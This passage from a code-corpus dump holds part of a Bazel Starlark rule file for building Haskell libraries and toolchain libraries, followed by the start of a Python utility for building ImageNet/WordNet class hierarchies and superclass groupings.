hs.actions.write(empty_c, \"\")\n\n static_library = link_library_static(\n hs,\n cc,\n posix,\n dep_info,\n depset([empty_c]),\n my_pkg_id,\n with_profiling = with_profiling,\n libdir = empty_libs_dir,\n )\n libs = [static_library]\n\n if with_shared:\n dynamic_library = link_library_dynamic(\n hs,\n cc,\n posix,\n dep_info,\n depset(),\n depset([empty_c]),\n my_pkg_id,\n [],\n empty_libs_dir,\n )\n libs = [dynamic_library, static_library]\n\n return libs\n\ndef haskell_library_impl(ctx):\n hs = haskell_context(ctx)\n deps = ctx.attr.deps + ctx.attr.exports + ctx.attr.narrowed_deps\n dep_info = gather_dep_info(ctx.attr.name, ctx.attr.deps + ctx.attr.exports)\n narrowed_deps_info = gather_dep_info(ctx.attr.name, ctx.attr.narrowed_deps)\n all_deps_info = gather_dep_info(ctx.attr.name, deps)\n all_plugins = ctx.attr.plugins + ctx.attr.non_default_plugins\n plugin_dep_info = gather_dep_info(\n ctx.attr.name,\n [dep for plugin in all_plugins for dep in plugin[GhcPluginInfo].deps],\n )\n package_ids = all_dependencies_package_ids(deps)\n\n modules = ctx.attr.modules\n if modules and ctx.files.srcs:\n fail(\"\"\"Only one of \"srcs\" or \"modules\" attributes must be specified in {}\"\"\".format(ctx.label))\n\n if not modules and ctx.attr.narrowed_deps:\n fail(\"\"\"The attribute \"narrowed_deps\" is enabled only if \"modules\" is specified in {}\"\"\".format(ctx.label))\n\n # Add any interop info for other languages.\n cc = cc_interop_info(\n ctx,\n override_cc_toolchain = hs.tools_config.maybe_exec_cc_toolchain,\n )\n java = java_interop_info(ctx.attr.deps + ctx.attr.narrowed_deps)\n\n # Make shell tools available.\n posix = ctx.toolchains[\"@rules_sh//sh/posix:toolchain_type\"]\n\n with_profiling = is_profiling_enabled(hs)\n srcs_files, import_dir_map = _prepare_srcs(ctx.attr.srcs)\n module_map = determine_module_names(srcs_files)\n\n package_name = getattr(ctx.attr, \"package_name\", None)\n version = getattr(ctx.attr, \"version\", None)\n my_pkg_id = pkg_id.new(ctx.label, package_name, version)\n\n # If we're compiling a package, put the interfaces inside the\n # package directory.\n interfaces_dir = paths.join(pkg_id.to_string(my_pkg_id), \"_iface\")\n objects_dir = paths.join(\"_obj\", hs.name)\n\n non_empty = srcs_files or modules\n\n with_shared = not ctx.attr.linkstatic\n if with_profiling or hs.toolchain.static_runtime:\n # NOTE We can't have profiling and dynamic code at the\n # same time, see:\n # https://ghc.haskell.org/trac/ghc/ticket/15394\n # Also, static GHC doesn't support dynamic code\n with_shared = False\n\n module_outputs = build_haskell_modules(ctx, hs, cc, posix, pkg_id.to_string(my_pkg_id), with_profiling, with_shared, interfaces_dir, objects_dir)\n\n plugins = [resolve_plugin_tools(ctx, plugin[GhcPluginInfo]) for plugin in ctx.attr.plugins]\n non_default_plugins = [resolve_plugin_tools(ctx, plugin[GhcPluginInfo]) for plugin in ctx.attr.non_default_plugins]\n preprocessors = _resolve_preprocessors(ctx, ctx.attr.tools)\n user_compile_flags = _expand_make_variables(\"ghcopts\", ctx, ctx.attr.ghcopts)\n c = hs.toolchain.actions.compile_library(\n hs,\n cc,\n java,\n posix,\n dep_info,\n plugin_dep_info,\n srcs = srcs_files,\n module_map = module_map,\n import_dir_map = import_dir_map,\n extra_srcs = depset(ctx.files.extra_srcs),\n user_compile_flags = user_compile_flags,\n with_shared = with_shared,\n with_profiling = with_profiling,\n interfaces_dir = interfaces_dir,\n objects_dir = objects_dir,\n my_pkg_id = my_pkg_id,\n plugins = plugins,\n non_default_plugins = non_default_plugins,\n preprocessors = preprocessors,\n )\n\n other_modules = ctx.attr.hidden_modules\n exposed_modules_reexports = _exposed_modules_reexports(ctx.attr.reexported_modules)\n haskell_module_names = [haskell_module_from_target(m) for m in modules]\n exposed_modules = set.from_list(module_map.keys() + exposed_modules_reexports + haskell_module_names)\n set.mutable_difference(exposed_modules, set.from_list(other_modules))\n exposed_modules = set.to_list(exposed_modules)\n\n if non_empty:\n static_library = link_library_static(\n hs,\n cc,\n posix,\n all_deps_info,\n depset(c.object_files, transitive = [module_outputs.os]),\n my_pkg_id,\n with_profiling = with_profiling,\n )\n else:\n static_library = None\n\n if with_shared and non_empty:\n dynamic_library = link_library_dynamic(\n hs,\n cc,\n posix,\n all_deps_info,\n depset(ctx.files.extra_srcs),\n depset(c.dyn_object_files, transitive = [module_outputs.dyn_os]),\n my_pkg_id,\n user_compile_flags,\n )\n else:\n dynamic_library = None\n\n conf_file, cache_file = package(\n hs,\n cc,\n posix,\n all_deps_info,\n with_shared,\n exposed_modules,\n other_modules,\n my_pkg_id,\n non_empty,\n )\n\n empty_libs_dir = \"empty_libs\"\n conf_file_empty, cache_file_empty = package(\n hs,\n cc,\n posix,\n all_deps_info,\n with_shared,\n exposed_modules,\n other_modules,\n my_pkg_id,\n non_empty,\n empty_libs_dir,\n )\n\n interface_dirs = depset(\n direct = c.interface_files,\n transitive = [all_deps_info.interface_dirs, module_outputs.his, module_outputs.dyn_his],\n )\n\n version_macros = set.empty()\n if version:\n package_name = hs.name\n if hasattr(ctx.attr, \"package_name\") and ctx.attr.package_name:\n package_name = ctx.attr.package_name\n version_macros = set.singleton(\n generate_version_macros(ctx, package_name, version),\n )\n\n empty_libs = _create_empty_library(hs, cc, posix, my_pkg_id, with_shared, with_profiling, empty_libs_dir)\n\n export_infos = gather_dep_info(ctx.attr.name, ctx.attr.exports)\n hs_info = HaskellInfo(\n package_databases = depset([cache_file], transitive = [all_deps_info.package_databases]),\n empty_lib_package_databases = depset(\n direct = [cache_file_empty],\n transitive = [\n dep_info.package_databases,\n narrowed_deps_info.empty_lib_package_databases,\n export_infos.empty_lib_package_databases,\n ],\n ),\n version_macros = version_macros,\n source_files = c.source_files,\n boot_files = c.boot_files,\n extra_source_files = c.extra_source_files,\n import_dirs = set.mutable_union(c.import_dirs, export_infos.import_dirs),\n hs_libraries = depset(\n direct = [lib for lib in [static_library, dynamic_library] if lib],\n transitive = [all_deps_info.hs_libraries],\n ),\n deps_hs_libraries = depset(\n transitive = [dep_info.hs_libraries, narrowed_deps_info.deps_hs_libraries],\n ),\n empty_hs_libraries = depset(\n direct = empty_libs,\n transitive = [all_deps_info.empty_hs_libraries, export_infos.empty_hs_libraries],\n ),\n interface_dirs = depset(transitive = [interface_dirs, export_infos.interface_dirs]),\n deps_interface_dirs = depset(transitive = [dep_info.interface_dirs, narrowed_deps_info.deps_interface_dirs]),\n compile_flags = c.compile_flags,\n user_compile_flags = user_compile_flags,\n user_repl_flags = _expand_make_variables(\"repl_ghci_args\", ctx, ctx.attr.repl_ghci_args),\n per_module_transitive_interfaces = module_outputs.per_module_transitive_interfaces,\n per_module_transitive_objects = module_outputs.per_module_transitive_objects,\n )\n\n exports = [\n reexp[HaskellLibraryInfo]\n for reexp in ctx.attr.exports\n if HaskellCoverageInfo in reexp\n ]\n lib_info = HaskellLibraryInfo(\n package_id = pkg_id.to_string(my_pkg_id),\n version = version,\n exports = exports,\n )\n\n dep_coverage_data = []\n for dep in deps:\n if HaskellCoverageInfo in dep:\n dep_coverage_data += dep[HaskellCoverageInfo].coverage_data\n\n coverage_data = dep_coverage_data + c.coverage_data\n coverage_data = list.dedup_on(_get_mix_filepath, coverage_data)\n\n coverage_info = HaskellCoverageInfo(\n coverage_data = coverage_data,\n )\n\n target_files = depset([file for file in [static_library, dynamic_library] if file])\n\n if hasattr(ctx, \"outputs\"):\n extra_args = _expand_make_variables(\"runcompile_flags\", ctx, ctx.attr.runcompile_flags)\n user_compile_flags = _expand_make_variables(\"ghcopts\", ctx, ctx.attr.ghcopts)\n build_haskell_runghc(\n hs,\n cc,\n posix,\n runghc_wrapper = ctx.file._ghci_repl_wrapper,\n extra_args = extra_args,\n user_compile_flags = user_compile_flags,\n output = ctx.outputs.runghc,\n package_databases = all_deps_info.package_databases,\n version = ctx.attr.version,\n hs_info = hs_info,\n lib_info = lib_info,\n )\n\n default_info = None\n\n if hasattr(ctx, \"runfiles\"):\n default_info = DefaultInfo(\n files = target_files,\n runfiles = ctx.runfiles(transitive_files = java.inputs, collect_data = True),\n )\n else:\n default_info = DefaultInfo(\n files = target_files,\n )\n\n # Create a CcInfo provider so that CC rules can work with\n # a haskell library as if it was a regular CC one.\n\n # XXX: protobuf is passing a \"patched ctx\"\n # which includes the real ctx as \"real_ctx\"\n real_ctx = getattr(ctx, \"real_ctx\", ctx)\n cc_toolchain = find_cc_toolchain(real_ctx)\n feature_configuration = cc_common.configure_features(\n ctx = real_ctx,\n cc_toolchain = cc_toolchain,\n requested_features = ctx.features,\n unsupported_features = ctx.disabled_features,\n )\n if dynamic_library or static_library:\n linker_inputs = [\n cc_common.create_linker_input(\n owner = ctx.label,\n libraries = depset(direct = [\n cc_common.create_library_to_link(\n actions = ctx.actions,\n feature_configuration = feature_configuration,\n dynamic_library = dynamic_library,\n dynamic_library_symlink_path = dynamic_library.basename if dynamic_library else \"\",\n static_library = static_library,\n cc_toolchain = cc_toolchain,\n ),\n ]),\n ),\n ]\n else:\n linker_inputs = []\n compilation_context = cc_common.create_compilation_context()\n linking_context = cc_common.create_linking_context(\n linker_inputs = depset(direct = linker_inputs),\n )\n out_cc_info = cc_common.merge_cc_infos(\n cc_infos = [\n CcInfo(\n compilation_context = compilation_context,\n linking_context = linking_context,\n ),\n ] + [dep[CcInfo] for dep in deps if CcInfo in dep],\n )\n\n return [\n hs_info,\n out_cc_info,\n coverage_info,\n default_info,\n lib_info,\n OutputGroupInfo(**dicts.add(\n compile_info_output_groups(\n # For haskell_proto_aspect, which doesn't have a ctx.workspace_name,\n # just set it to \"\". It won't matter in practice because those rules don't\n # have runfiles and won't be compiled directly anyway.\n workspace_name = getattr(ctx, \"workspace_name\", \"\"),\n hs = hs,\n cc = cc,\n name = ctx.label.name,\n c = c,\n posix = posix,\n runfiles = default_info.default_runfiles.files if getattr(default_info, \"default_runfiles\", None) else depset(),\n ),\n library_info_output_groups(\n name = ctx.label.name,\n hs = hs,\n hs_info = hs_info,\n lib_info = lib_info,\n ),\n )),\n ]\n\n# We should not need this provider. It exists purely as a workaround\n# for https://github.com/bazelbuild/bazel/issues/8129.\n#\n# TODO Get rid of this by computing a CcInfo in haskell_import\n# instead. Currently blocked on upstream.\nHaskellImportHack = provider()\nHaskellToolchainLibraries = provider()\n\ndef haskell_toolchain_library_impl(ctx):\n hs = haskell_context(ctx)\n if ctx.attr.package:\n package = ctx.attr.package\n else:\n package = ctx.label.name\n\n libraries = ctx.attr._toolchain_libraries[HaskellToolchainLibraries].libraries\n target = libraries.get(package)\n\n if not target:\n fail(\n \"\"\"\n{} is not a toolchain library.\nCheck that it ships with your version of GHC.\nThe following toolchain libraries are available:\n{}\n \"\"\".format(package, libraries),\n )\n\n return [\n target.default_info,\n target.hs_info,\n target.hs_lib_info,\n target.cc_info,\n target.haddock_info,\n HaskellToolchainLibraryInfo(),\n OutputGroupInfo(**library_info_output_groups(\n hs = hs,\n name = ctx.label.name,\n hs_info = target.hs_info,\n lib_info = target.hs_lib_info,\n )),\n ]\n\ndef _toolchain_library_symlink(dynamic_library):\n prefix = dynamic_library.owner.workspace_root.replace(\"_\", \"_U\").replace(\"/\", \"_S\")\n basename = dynamic_library.basename\n return paths.join(prefix, basename)\n\ndef haskell_toolchain_libraries_impl(ctx):\n hs = haskell_context(ctx)\n with_profiling = is_profiling_enabled(hs)\n with_threaded = \"-threaded\" in hs.toolchain.ghcopts\n\n cc_toolchain = find_cc_toolchain(ctx)\n feature_configuration = cc_common.configure_features(\n ctx = ctx,\n cc_toolchain = cc_toolchain,\n requested_features = ctx.features,\n unsupported_features = ctx.disabled_features,\n )\n\n libraries = hs.toolchain.libraries\n\n # List of library in left-to-right post-ordering\n # Meaning, if package B depends on package A, then A will appear before B.\n ordered = depset(transitive = [\n target[HaskellImportHack].transitive_depends\n for target in hs.toolchain.libraries.values()\n ])\n\n library_dict = {}\n for package in ordered.to_list():\n target = libraries[package]\n\n # Construct CcInfo\n additional_link_inputs = []\n if with_profiling:\n # GHC does not provide dynamic profiling mode libraries. The dynamic\n # libraries that are available are missing profiling symbols, that\n # other profiling mode build results will reference. Therefore, we\n # don't import dynamic libraries in profiling mode.\n libs = {\n get_static_hs_lib_name(hs.toolchain.version, lib): {\"static\": lib}\n for lib in target[HaskellImportHack].static_profiling_libraries.to_list()\n }\n else:\n # Workaround for https://github.com/tweag/rules_haskell/issues/881\n # Static and dynamic libraries don't necessarily pair up 1 to 1.\n # E.g. the rts package in the Unix GHC bindist contains the\n # dynamic libHSrts and the static libCffi and libHSrts.\n libs = {}\n for lib in target[HaskellImportHack].dynamic_libraries.to_list():\n libname = get_dynamic_hs_lib_name(hs.toolchain.version, lib)\n if libname == \"ffi\" and libname in libs:\n # Make sure that the file of libffi matching its soname\n # ends up in target runfiles. Otherwise, execution will\n # fail with \"cannot open shared object file\" errors.\n # On Linux libffi comes in three shapes:\n # libffi.so, libffi.so.7, libffi.so.7.1.0\n # (version numbers may vary)\n # The soname is then libffi.so.7, meaning, at runtime the\n # dynamic linker will look for libffi.so.7. So, that file\n # should be the LibraryToLink.dynamic_library.\n ext_components = get_lib_extension(lib).split(\".\")\n if len(ext_components) == 2 and ext_components[0] == \"so\":\n libs[libname][\"dynamic\"] = lib\n else:\n libs[libname] = {\"dynamic\": lib}\n for lib in target[HaskellImportHack].static_libraries.to_list():\n name = get_static_hs_lib_name(with_profiling, lib)\n entry = libs.get(name, {})\n entry[\"static\"] = lib\n libs[name] = entry\n\n # Avoid duplicate runtime and ffi libraries. These libraries come\n # in threaded and non-threaded flavors. Depending on the\n # compilation mode we want to forward only one or the other.\n # XXX: Threaded mode should be a per-target property. Use Bazel\n # build configurations and transitions to select the threaded or\n # non-threaded runtime and ffi on a per-target basis.\n if \"HSrts_thr\" in libs:\n if with_threaded:\n libs[\"HSrts\"] = libs[\"HSrts_thr\"]\n libs.pop(\"HSrts_thr\")\n if \"Cffi_thr\" in libs:\n if with_threaded:\n libs[\"ffi\"][\"static\"] = libs[\"Cffi_thr\"][\"static\"]\n libs.pop(\"Cffi_thr\")\n linker_inputs = [\n cc_common.create_linker_input(\n owner = ctx.label,\n libraries = depset(direct = [\n cc_common.create_library_to_link(\n actions = ctx.actions,\n feature_configuration = feature_configuration,\n dynamic_library = lib.get(\"dynamic\", None),\n dynamic_library_symlink_path =\n _toolchain_library_symlink(lib[\"dynamic\"]) if lib.get(\"dynamic\") else \"\",\n static_library = lib.get(\"static\", None),\n cc_toolchain = cc_toolchain,\n )\n for lib in libs.values()\n ]),\n user_link_flags = depset(direct = target[HaskellImportHack].linkopts),\n ),\n ]\n compilation_context = cc_common.create_compilation_context(\n headers = target[HaskellImportHack].headers,\n includes = target[HaskellImportHack].includes,\n )\n linking_context = cc_common.create_linking_context(\n linker_inputs = depset(direct = linker_inputs),\n )\n cc_info = CcInfo(\n compilation_context = compilation_context,\n linking_context = linking_context,\n )\n library_dict[package] = struct(\n default_info = target[DefaultInfo],\n hs_info = target[HaskellInfo],\n hs_lib_info = target[HaskellLibraryInfo],\n cc_info = cc_common.merge_cc_infos(cc_infos = [cc_info] + [\n library_dict[dep].cc_info\n for dep in target[HaskellImportHack].depends\n ]),\n haddock_info = target[HaddockInfo],\n )\n\n return [HaskellToolchainLibraries(libraries = library_dict)]\n\nhaskell_toolchain_libraries = rule(\n haskell_toolchain_libraries_impl,\n attrs = {\n \"_cc_toolchain\": attr.label(\n default = Label(\"@rules_cc//cc:current_cc_toolchain\"),\n ),\n },\n toolchains = [\n \"@rules_cc//cc:toolchain_type\",\n \"@rules_haskell//haskell:toolchain\",\n ],\n fragments = [\"cpp\"],\n)\n\"\"\"Generate Haskell toolchain libraries.\n\nThis is an internal rule and should not be user facing.\n\nThis rule is a work-around for toolchain transitions not being implemented,\nyet. See\nhttps://github.com/bazelbuild/proposals/blob/master/designs/2019-02-12-toolchain-transitions.md\nThis will need to be revisited once that proposal is implemented.\n\"\"\"\n\ndef haskell_import_impl(ctx):\n # The `allow_files` attribute of `rule` cannot define patterns of accepted\n # file extensions like `.so.*`. Instead, we check for the correct file\n # extensions here.\n for lib in ctx.files.shared_libraries:\n msg = \"in shared_libraries attribute of haskell_import rule {}: \" + \\\n \"source file '{}' is misplaced here \" + \\\n \"(expected .dll, .dylib, .so or .so.*)\"\n ext = get_lib_extension(lib)\n if not (ext in [\"dll\", \"dylib\", \"so\"] or ext.startswith(\"so.\")):\n fail(msg.format(str(ctx.label), str(lib.short_path)))\n\n id = ctx.attr.id or ctx.attr.name\n target_files = [\n file\n for file in ctx.files.static_libraries + ctx.files.shared_libraries\n ]\n version_macros = set.empty()\n if ctx.attr.version != None:\n version_macros = set.singleton(\n generate_version_macros(ctx, ctx.label.name, ctx.attr.version),\n )\n hs_info = HaskellInfo(\n # XXX Empty set of conf and cache files only works for global db.\n package_databases = depset(),\n empty_lib_package_databases = depset(),\n version_macros = version_macros,\n source_files = depset(),\n boot_files = depset(),\n extra_source_files = depset(),\n import_dirs = set.empty(),\n hs_libraries = depset(),\n deps_hs_libraries = depset(),\n empty_hs_libraries = depset(),\n interface_dirs = depset(),\n deps_interface_dirs = depset(),\n compile_flags = [],\n user_compile_flags = [],\n user_repl_flags = [],\n )\n import_info = HaskellImportHack(\n # Make sure we're using the same order for dynamic_libraries,\n # static_libraries.\n dynamic_libraries = depset(ctx.files.shared_libraries),\n static_libraries = depset(ctx.files.static_libraries, order = \"topological\"),\n # NOTE: haskell_import is evaluated as a toolchain rule. Even if we\n # bazel build with -c dbg, this rule is still executed with\n # ctx.var[\"COMPILATION_MODE\"] == \"opt\". Therefore, we need to carry\n # both profiling and non-profiling libraries forward so that a later\n # haskell_toolchain_library can select the appropriate artifacts.\n static_profiling_libraries = depset(ctx.files.static_profiling_libraries, order = \"topological\"),\n headers = depset(ctx.files.hdrs),\n includes = depset(ctx.attr.includes),\n linkopts = ctx.attr.linkopts,\n depends = [dep.label.name for dep in ctx.attr.deps],\n transitive_depends = depset(\n direct = [ctx.attr.name],\n transitive = [dep[HaskellImportHack].transitive_depends for dep in ctx.attr.deps],\n order = \"postorder\",\n ),\n )\n\n coverage_info = HaskellCoverageInfo(coverage_data = [])\n lib_info = HaskellLibraryInfo(\n package_id = id,\n version = ctx.attr.version,\n exports = [],\n )\n default_info = DefaultInfo(\n files = depset(target_files),\n )\n\n # This package haddock informations\n transitive_html = {id: ctx.file.haddock_html} if ctx.file.haddock_html else {}\n transitive_haddocks = {id: ctx.files.haddock_interfaces}\n\n # Add dependencies haddock informations\n for dep in ctx.attr.deps:\n transitive_html.update(dep[HaddockInfo].transitive_html)\n transitive_haddocks.update(dep[HaddockInfo].transitive_haddocks)\n\n haddock_info = HaddockInfo(\n package_id = id,\n transitive_html = transitive_html,\n transitive_haddocks = transitive_haddocks,\n )\n\n return [\n hs_info,\n import_info,\n coverage_info,\n default_info,\n lib_info,\n haddock_info,\n ]\n\ndef _exposed_modules_reexports(reexported_modules):\n \"\"\"Creates a ghc-pkg-compatible list of reexport declarations.\n\n A ghc-pkg registration file declares reexports as part of the\n exposed-modules field in the following format:\n\n exposed-modules: A, B, C from pkg-c:C, D from pkg-d:Original.D\n\n Here, the Original.D module from pkg-d is renamed by virtue of a\n different name being used before the \"from\" keyword.\n\n This function creates a ghc-pkg-compatible list of reexport declarations\n (as shown above) from a dictionary mapping package targets to \"Cabal-style\"\n reexported-modules declarations. That is, something like:\n\n {\n \":pkg-c\": \"C\",\n \":pkg-d\": \"Original.D as D\",\n \":pkg-e\": \"E1, Original.E2 as E2\",\n }\n\n Args:\n reexported_modules: a dictionary mapping package targets to \"Cabal-style\"\n reexported-modules declarations.\n\n Returns:\n a ghc-pkg-compatible list of reexport declarations.\n \"\"\"\n exposed_reexports = []\n for dep, cabal_decls in reexported_modules.items():\n for cabal_decl in cabal_decls.split(\",\"):\n stripped_cabal_decl = cabal_decl.strip()\n cabal_decl_parts = stripped_cabal_decl.split(\" as \")\n original = cabal_decl_parts[0]\n if len(cabal_decl_parts) == 2:\n reexported = cabal_decl_parts[1]\n else:\n reexported = cabal_decl_parts[0]\n if HaskellLibraryInfo in dep:\n pkg = dep[HaskellLibraryInfo].package_id\n exposed_reexport = \"{reexported} from {pkg}:{original}\".format(\n reexported = reexported,\n pkg = pkg,\n original = original,\n )\n exposed_reexports.append(exposed_reexport)\n\n return exposed_reexports\n\ndef _get_mix_filepath(coverage_datum):\n \"\"\" Extracts mix file path from a coverage datum.\n \"\"\"\n return coverage_datum.mix_file.short_path\n"} {"ext": "py", "sha": "1a3125d04d238348d257b41efc876f7e003b2f23", "content": "import os\nimport numpy as np\nimport json\nfrom itertools import product\n\n\n\nclass Node():\n '''\n Class for representing a node in the ImageNet/WordNet hierarchy. \n '''\n def __init__(self, wnid, parent_wnid=None, name=\"\"):\n \"\"\"\n Args:\n wnid (str) : WordNet ID for synset represented by node\n parent_wnid (str) : WordNet ID for synset of node's parent\n name (str) : word/human-interpretable description of synset \n \"\"\"\n\n self.wnid = wnid\n self.name = name\n self.class_num = -1\n self.parent_wnid = parent_wnid\n self.descendant_count_in = 0\n self.descendants_all = set()\n \n def add_child(self, child):\n \"\"\"\n Add child to given node.\n\n Args:\n child (Node) : Node object for child\n \"\"\"\n child.parent_wnid = self.wnid\n \n def __str__(self):\n return f'Name: ({self.name}), ImageNet Class: ({self.class_num}), Descendants: ({self.descendant_count_in})'\n \n def __repr__(self):\n return f'Name: ({self.name}), ImageNet Class: ({self.class_num}), Descendants: ({self.descendant_count_in})'\n\nclass ImageNetHierarchy():\n '''\n Class for representing ImageNet/WordNet hierarchy. \n '''\n def __init__(self, ds_path, ds_info_path):\n \"\"\"\n Args:\n ds_path (str) : Path to ImageNet dataset\n ds_info_path (str) : Path to supplementary files for the ImageNet dataset \n ('wordnet.is_a.txt', 'words.txt' and 'imagenet_class_index.json')\n which can be obtained from http://image-net.org/download-API.\n\n \"\"\"\n self.tree = {}\n\n ret = self.load_imagenet_info(ds_path, ds_info_path)\n self.in_wnids, self.wnid_to_name, self.wnid_to_num, self.num_to_name = ret\n \n with open(os.path.join(ds_info_path, 'wordnet.is_a.txt'), 'r') as f:\n for line in f.readlines():\n parent_wnid, child_wnid = line.strip('\\n').split(' ')\n parentNode = self.get_node(parent_wnid)\n childNode = self.get_node(child_wnid)\n parentNode.add_child(childNode)\n \n for wnid in self.in_wnids:\n self.tree[wnid].descendant_count_in = 0\n self.tree[wnid].class_num = self.wnid_to_num[wnid]\n \n for wnid in self.in_wnids:\n node = self.tree[wnid]\n while node.parent_wnid is not None:\n self.tree[node.parent_wnid].descendant_count_in += 1\n self.tree[node.parent_wnid].descendants_all.update(node.descendants_all)\n self.tree[node.parent_wnid].descendants_all.add(node.wnid)\n node = self.tree[node.parent_wnid]\n \n del_nodes = [wnid for wnid in self.tree \\\n if (self.tree[wnid].descendant_count_in == 0 and self.tree[wnid].class_num == -1)]\n for d in del_nodes:\n self.tree.pop(d, None)\n \n assert all([k.descendant_count_in > 0 or k.class_num != -1 for k in self.tree.values()])\n\n self.wnid_sorted = sorted(sorted([(k, v.descendant_count_in, len(v.descendants_all)) \\\n for k, v in self.tree.items()\n ],\n key=lambda x: x[2], \n reverse=True\n ),\n key=lambda x: x[1], \n reverse=True\n )\n\n @staticmethod\n def load_imagenet_info(ds_path, ds_info_path):\n \"\"\"\n Get information about mapping between ImageNet wnids/class numbers/class names.\n\n Args:\n ds_path (str) : Path to ImageNet dataset\n ds_info_path (str) : Path to supplementary files for the ImageNet dataset \n ('wordnet.is_a.txt', 'words.txt', 'imagenet_class_index.json')\n which can be obtained from http://image-net.org/download-API.\n\n \"\"\"\n files = os.listdir(os.path.join(ds_path, 'train'))\n in_wnids = [f for f in files if f[0]=='n'] \n\n f = open(os.path.join(ds_info_path, 'words.txt'))\n wnid_to_name = [l.strip() for l in f.readlines()]\n wnid_to_name = {l.split('\\t')[0]: l.split('\\t')[1] \\\n for l in wnid_to_name}\n\n with open(os.path.join(ds_info_path, 'imagenet_class_index.json'), 'r') as f:\n base_map = json.load(f)\n wnid_to_num = {v[0]: int(k) for k, v in base_map.items()}\n num_to_name = {int(k): v[1] for k, v in base_map.items()}\n\n return in_wnids, wnid_to_name, wnid_to_num, num_to_name\n\n def get_node(self, wnid):\n \"\"\"\n Add node to tree.\n\n Args:\n wnid (str) : WordNet ID for synset represented by node\n\n Returns:\n A node object representing the specified wnid.\n \"\"\"\n if wnid not in self.tree:\n self.tree[wnid] = Node(wnid, name=self.wnid_to_name[wnid])\n return self.tree[wnid]\n\n\n def is_ancestor(self, ancestor_wnid, child_wnid):\n \"\"\"\n Check if a node is an ancestor of another.\n\n Args:\n ancestor_wnid (str) : WordNet ID for synset represented by ancestor node\n child_wnid (str) : WordNet ID for synset represented by child node\n\n Returns:\n A boolean variable indicating whether or not the node is an ancestor\n \"\"\"\n return (child_wnid in self.tree[ancestor_wnid].descendants_all)\n\n \n def get_descendants(self, node_wnid, in_imagenet=False):\n \"\"\"\n Get all descendants of a given node.\n\n Args:\n node_wnid (str) : WordNet ID for synset for node\n in_imagenet (bool) : If True, only considers descendants among \n ImageNet synsets, else considers all possible\n descendants in the WordNet hierarchy\n\n Returns:\n A set of wnids corresponding to all the descendants\n \"\"\" \n if in_imagenet:\n return set([self.wnid_to_num[ww] for ww in self.tree[node_wnid].descendants_all\n if ww in set(self.in_wnids)])\n else:\n return self.tree[node_wnid].descendants_all\n \n def get_superclasses(self, n_superclasses, \n ancestor_wnid=None, superclass_lowest=None, \n balanced=True):\n \"\"\"\n Get superclasses by grouping together classes from the ImageNet dataset.\n\n Args:\n n_superclasses (int) : Number of superclasses desired\n ancestor_wnid (str) : (optional) WordNet ID that can be used to specify\n common ancestor for the selected superclasses\n superclass_lowest (set of str) : (optional) Set of WordNet IDs of nodes\n that shouldn't be further sub-classes\n balanced (bool) : If True, all the superclasses will have the same number\n of ImageNet subclasses\n\n Returns:\n superclass_wnid (list): List of WordNet IDs of superclasses\n class_ranges (list of sets): List of ImageNet subclasses per superclass\n label_map (dict): Mapping from class number to human-interpretable description\n for each superclass\n \"\"\" \n \n assert superclass_lowest is None or \\\n not any([self.is_ancestor(s1, s2) for s1, s2 in product(superclass_lowest, superclass_lowest)])\n \n superclass_info = []\n for (wnid, ndesc_in, ndesc_all) in self.wnid_sorted:\n \n if len(superclass_info) == n_superclasses:\n break\n \n if ancestor_wnid is None or self.is_ancestor(ancestor_wnid, wnid):\n keep_wnid = [True] * (len(superclass_info) + 1)\n superclass_info.append((wnid, ndesc_in))\n \n for ii, (w, d) in enumerate(superclass_info):\n if self.is_ancestor(w, wnid):\n if superclass_lowest and w in superclass_lowest:\n keep_wnid[-1] = False\n else:\n keep_wnid[ii] = False\n \n for ii in range(len(superclass_info) - 1, -1, -1):\n if not keep_wnid[ii]:\n superclass_info.pop(ii)\n \n superclass_wnid = [w for w, _ in superclass_info]\n class_ranges, label_map = self.get_subclasses(superclass_wnid, \n balanced=balanced)\n \n return superclass_wnid, class_ranges, label_map\n\n\n def get_subclasses(self, superclass_wnid, balanced=True):\n \"\"\"\n Get ImageNet subclasses for a given set of superclasses from the WordNet \n hierarchy. \n\n Args:\n superclass_wnid (list): List of WordNet IDs of superclasses\n balanced (bool) : If True, all the superclasses will have the same number\n of ImageNet subclasses\n\n Returns:\n class_ranges (list of sets): List of ImageNet subclasses per superclass\n label_map (dict): Mapping from class number to human-interpretable description\n for each superclass\n \"\"\" \n ndesc_min = min([self.tree[w].descendant_count_in for w in superclass_wnid]) \n class_ranges, label_map = [], {}\n for ii, w in enumerate(superclass_wnid):\n descendants = self.get_descendants(w, in_imagenet=True)\n if balanced and len(descendants) > ndesc_min:\n descendants = set([dd for ii, dd in enumerate(sorted(list(descendants))) if ii < ndesc_min])\n class_ranges.append(descendants)\n label_map[ii] = self.tree[w].name\n \n for i in range(len(class_ranges)):\n for j in range(i + 1, len(class_ranges)):\n assert(len(class_ranges[i].intersection(class_ranges[j])) == 0)\n \n return class_ranges, label_map\n\ndef common_superclass_wnid(group_name):\n \"\"\"\n Get WordNet IDs of common superclasses. \n\n Args:\n group_name (str): Name of group\n\n Returns:\n superclass_wnid (list): List of WordNet IDs of superclasses\n \"\"\" \n common_groups = {\n\n # ancestor_wnid = 'n00004258'\n 'living_9': ['n02084071', #dog, domestic dog, Canis familiaris\n 'n01503061', # bird\n 'n01767661', # arthropod\n 'n01661091', # reptile, reptilian\n 'n02469914', # primate\n 'n02512053', # fish\n 'n02120997', # feline, felid\n 'n02401031', # bovid\n 'n01627424', # amphibian\n ],\n\n 'mixed_10': [\n 'n02084071', #dog,\n 'n01503061', #bird \n 'n02159955', #insect \n 'n02484322', #monkey \n 'n02958343', #car \n 'n02120997', #feline \n 'n04490091', #truck \n 'n13134947', #fruit \n 'n12992868', #fungus \n 'n02858304', #boat \n ],\n\n 'mixed_13': ['n02084071', #dog,\n 'n01503061', #bird (52)\n 'n02159955', #insect (27)\n 'n03405725', #furniture (21)\n 'n02512053', #fish (16),\n 'n02484322', #monkey (13)\n 'n02958343', #car (10)\n 'n02120997', #feline (8),\n 'n04490091', #truck (7)\n 'n13134947', #fruit (7)\n 'n12992868', #fungus (7)\n 'n02858304', #boat (6) \n 'n03082979', #computer(6)\n ],\n\n # Dataset from Geirhos et al., 2018: arXiv:1811.12231\n 'geirhos_16': ['n02686568', #aircraft (3)\n 'n02131653', #bear (3)\n 'n02834778', #bicycle (2)\n 'n01503061', #bird (52)\n 'n02858304', #boat (6)\n 'n02876657', #bottle (7)\n 'n02958343', #car (10)\n 'n02121808', #cat (5)\n 'n03001627', #char (4)\n 'n03046257', #clock (3)\n 'n02084071', #dog (116)\n 'n02503517', #elephant (2)\n 'n03614532', #keyboard (3)\n 